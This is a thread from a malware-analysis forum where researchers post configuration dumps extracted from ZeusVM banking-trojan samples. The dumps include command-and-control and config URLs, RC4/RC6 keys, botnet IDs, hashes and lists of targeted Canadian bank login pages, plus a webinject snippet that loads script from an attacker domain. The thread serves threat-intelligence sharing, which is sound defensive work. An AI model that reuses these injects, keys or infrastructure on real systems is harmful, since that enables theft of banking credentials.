A forum for reverse engineering, OS internals and malware analysis 

ZeusVM (Zeus clone)

Forum for analysis and discussion about malware.

Re: ZeusVM (Zeus clone)

 #23309  by comak
 Tue Jul 08, 2014 9:01 am
cant download .jpg :(
Code: Select all
{
  "family": "vmzeus",
  "urls": "['https://billing-service.ru/logos/pizza.jpg']",
  "rc4sbox": "17d5f65eded48f801022341e21926d08153fa21f97c185735b6bdda6f49b31888ce2c278384e0096ef2eeabbd8be11f10b70a132ae260f646c5f025d180555c76f9fcfb8adceaf2bb6ed6a3ec82aec0a66823a2751cb9a72634dfbb71dac7db5603629b3b9d113a76281ee0ce8847c8e01d92d3df0e5bfe34a2fd6584265e0cc4ba3953394f77552091b43f9a541fd03ca8d4f0446f5307edb3b7be7fc9e44eb06c54c230dbab4b016b1451cdf71c0c656e44750d007fa1a79e9748ac9a0c3cd7a0ed267696e7628ab9ddabc86aad32554a8c44914bdfe879199128ba9355a24897fe69cdc6883a440192cb27720905993f2ff5c3c9837d761e139f8485753f30000",
  "cfg": "https://billing-service.ru/logos/pizza.jpg",
  "version": "02.00.00.00",
  "botnet": "G",
  "fakeurl": "http://vpzsr.com/lgnwfvhf/cfg.bin",
  "OtherStrigns": "[]",
  "OtherEncStrings": "[]",
  "rc6sbox": "2b59b92f2a710f897645f6b83e7b81947c95e74c320b2e74ac03c527eaed11380285d479e371125b73df5d57a327acddb1de61c3837017fcf0bd5de2c0bd8cbb2000536e269a9a4736289047ec5c8497a2cd36dc47b633f6102b34f62df781844a29963e0be7ac952e0eb090a566fda30191a89e9f28e908804af16d824d6827cf811bf721487107a2a8dff79a7ba784e6c639c364569480cc81ccb3b54937ffc80fbc64e00e6740c4a22c6b056261f4"
}

Re: ZeusVM (Zeus clone)

 #23310  by EP_X0FF
 Tue Jul 08, 2014 10:23 am
comak wrote:cant download .jpg :(
jpg in attach.
Attachments
pass: malware
(56.58 KiB) Downloaded 64 times

Re: ZeusVM (Zeus clone)

 #23311  by comak
 Tue Jul 08, 2014 10:36 am
thanks:
Code: Select all
Target: https://www.cibconline.cibc.com/olbtxn/user/ChangePVQ2.cibc*
Target: https://www.cibconline.cibc.com/olbtxn/user/VerifyPVQAction.cibc*
Target: https://www.cibconline.cibc.com/olbtxn/accounts/MyAccounts.cibc*
Target: https://www.cibconline.cibc.com/olbtxn/user/GetPVQAction.cibc*
Target: *tdcanadatrust.com*
Target: *www*royalbank.com/cgi-bin/rbaccess*
Target: *royalbank.com/wps/myportal*
Target: https://accesd.desjardins.com/tisecuADGestionAcces/logoff.do*
Target: https://accesd.desjardins.com/*/accesd/*
Target: https://accesd.desjardins.com/tisecuADGestionAcces/LogonAuthForteADP.do?msgId=logonValiderIdentit*
Target: https://accesd.desjardins.com/cooperADOperations/OperationImmediate.do*
Target: https://accesd.desjardins.com/tisecuADGestionAcces/ModifierQuestRepAuthForte.do*
Target: *scotiaonline.scotiabank.com/online/views*
Target: *bmo.com*
Attachments
(15.82 KiB) Downloaded 73 times

Re: ZeusVM (Zeus clone)

 #23460  by forty-six
 Tue Jul 29, 2014 1:48 am
bin + jpg in attach
Code: Select all
File:     file.file
Size:     224768
MD5:      7EF60352E4076902E4817115125AB72F
Compiled: Fri, Jul 25 2014, 15:41:11  - 32 Bit EXE
Version:  1.0.1.21
Attachments
(477.23 KiB) Downloaded 64 times

Re: ZeusVM (Zeus clone)

 #23461  by comak
 Tue Jul 29, 2014 9:25 am
Code: Select all
{ 
  "family": "vmzeus2",
  "OtherStrings": "[':http://hezslqy.com/bazfx/cfg.bin\\x00']",
  "urls": [
    "https://shared.wdc0.com/sh.jpg"
  ],
  "rc4sbox": "38729b74b8310529434c8d400b2e88ce1364a7d33482d02c65b7aa06b1db4837ef0d1fbb5f92f150bc665e191b7a0f3a205a69d736a59359ca55011eadb5cd97cb73f06b2718dd2aa20e222b9fe204ece7325dd684c27da828444d95f6c400dcba904f765c353e51a1ea710cc0477521c3e39c7f790860988cccb089cf1770879945ee1c6830bfdfb95458b30394029d83867be425570a63eb2309f511a34a264bf4a0a6339a2fc81a8ebe1256fc494efbf91df753bd8fb4b23dded1c6786ae86eabaf398142e5c5fe8af2c79eedd9e1b6ae3bda167c0714416de967fa467e2dd4fd5b96e6ac10c9e0806ca43fd5f8621561a93c9185c18bff6f77d2d82452f30000",
  "cfg": "https://shared.wdc0.com/sh.jpg",
  "version": "02.00.00.00",
  "botnet": "SHNEW",
  "fakeurl": "http://hezslqy.com/bazfx/cfg.bin",
  "OtherEncStrings": "['5lr|1=']",
  "rc6sbox": "340e74d2ddea02894f3754596ab9ef84b25abfb41c4422ea71020a9c312cae3c4edac489c0eb79f8fe0737d47f81f8bbf8649c95b28c1b55269ff07613d4c5fc33c1718bb6b2e1f2c85b7f1bb88321584c10735aa989b504ebf9c57fdabba95bf2d12ae17e39e1a132fd2920c79fa219bd3fc49e0b1ef07ac57e92172a1d713a836886052b8d2c7a211de514aef3a8685dd2cc30b7f2ba201e1c917d061ad1c3eae77ed9fd85e622e9862f63177cb3b8"
}
Attachments
(139.92 KiB) Downloaded 74 times

Re: ZeusVM (Zeus clone)

 #23639  by Xylitol
 Tue Aug 19, 2014 11:04 pm
Sample courtesy of Kafeine.
https://www.virustotal.com/en/file/beb8 ... 408490614/
Code: Select all
https://grohotaniratione200.com/999/gate.php
https://grohotaniratione200.com/999/ks4pj.exe
https://aconnuchena444.com/999/2j0.jpg
bot_url_notification_add http://myip.ru
bot_url_notification_add https://www.google.com.ua/*
[syntax="javascript"]
<script type='text/javascript' language='JavaScript'>
top.location.id="XYLITOL-F12F085_7875768FBC303C10";
</script>
<script src='https://roprostkoemnsuper200.com/jp/gat ... /mainAT.js' type='text/javascript' language='JavaScript' onreadystatechange="onLoad55676785(this||window.event);"></script>
<script src='https://roprostkoemnsuper200.com/jp/gat ... nocache.js' type='text/javascript' language='JavaScript' onreadystatechange="onLoad55676785(this||window.event);"></script>[/syntax]
Targeting Japan.
Attachments
infected
(535 KiB) Downloaded 91 times

Re: ZeusVM (Zeus clone)

 #24903  by tildedennis
 Sat Jan 10, 2015 4:49 pm
md5: 2aea22f0d77ecfe227616e34c0463c97
version: 2.0.0.0
config url: hXXp://pianoetude16.com/lib/sra.jpg

seems to be favoring .es and .pl domains. config attached.
Attachments
(18.54 KiB) Downloaded 66 times
 Return to “Malware”